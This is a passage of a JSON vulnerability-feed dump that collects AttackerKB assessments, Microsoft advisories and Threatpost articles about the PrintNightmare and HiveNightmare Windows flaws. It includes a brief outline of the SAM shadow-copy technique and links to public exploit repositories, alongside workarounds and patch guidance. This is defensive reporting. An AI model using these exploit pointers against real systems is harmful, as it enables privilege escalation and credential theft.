"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "href": "https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:40:12", "description": "Windows Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**Dviros** at July 25, 2021 9:35am UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\n**ccondon-r7** at July 21, 2021 4:24pm UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36934 Windows Elevation of Privilege", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2023-10-07T00:00:00", "id": "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "href": "https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-12-07T17:05:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Print Spooler Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:00:00", "id": "MS:CVE-2021-1675", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T17:05:42", "description": "A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nUPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.\n\nIn addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (**Note**: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):\n\n * HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n * NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)\n * UpdatePromptSettings = 0 (DWORD) or not defined (default setting)\n\n**Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.**\n\nUPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also [KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates](<https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7>).\n\nNote that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mscve", "title": "Windows Print Spooler Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-06-13T07:00:00", "id": "MS:CVE-2021-34527", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:03:31", "description": "An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nAn attacker must have the ability to execute code on a victim system to exploit this vulnerability.\n\nAfter installing this security update, you _must_ manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. **Simply installing this security update will not fully mitigate this vulnerability.** See [KB5005357- Delete Volume Shadow Copies](<https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T07:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-12T07:00:00", "id": "MS:CVE-2021-36934", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36934", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches as well as protections for CVE-2021-1675 as well as a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T19:49:18", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\n> Hey guys, I reported the vulnerability in Dec'20 but haven't disclosed details at MSRC's request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nOn Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printers installable via Point are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare **\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect 